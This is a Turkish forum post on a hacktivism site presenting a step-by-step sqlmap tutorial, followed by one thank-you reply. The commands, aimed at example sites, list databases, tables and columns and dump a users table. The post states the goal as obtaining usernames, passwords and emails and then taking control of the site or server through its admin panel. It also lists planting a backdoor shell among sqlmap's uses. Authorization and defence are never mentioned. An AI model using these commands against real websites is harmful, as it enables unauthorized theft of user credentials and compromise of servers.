• Forum yönetim ekibiyle iletişime geçmek istiyorsanız Sorun & Öneriler kategorisini kullanınız, özel mesajlara destek verilmemektedir. Sitemizde Bakım çalışması devam etmektedir...

Sqlmap nedir,Nasıl Kullanılır?

anonymous

Kayıtlı Üye
Katılım
26 Aralık 2020
Mesajlar
68
Tepkime puanı
76
İlgi Alanlarınız
pentest
Cinsiyet
  1. Erkek

Sqlmap nedir?

Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar.
sqlmap_bg2.jpg

Sqlmap ile ne yapabilirim?

-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmek
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.

Sqlmap nasıl kullanılır?


Sqlmap ile siteleri kontrol etmek için
Kod:
sqlmap -u URL

Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8

Sqlmap ile Database Listelenmesi ve Dump Edilmesi

Database listeleyebilmek için -dbs parametresi kullanılır.
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs

Database İçerisinden Bilgileri Almak
Örneğin orneksite.org sitesi için iki veritabanı bulundu

31d44879335c90ee72aec3b37cad48af.08-1.jpg
Main_wellerpools veritabanındaki tabloların listesini almak istiyorum
Kod:
sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables

Tabloların listesi

51bf6bd326c70cbf83c409134c81b20d.10-1.jpg

Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns

3157cddd313764901d9ba218ec6f2cc0.11-1.jpg
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump
d74fc3a589cbef45a02c0ef6a234bce0.12-1.jpg
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz

Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar
 

KocaReis

Developer
Katılım
17 Mayıs 2000
Mesajlar
638
Tepkime puanı
1,389
Eline sağlık
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst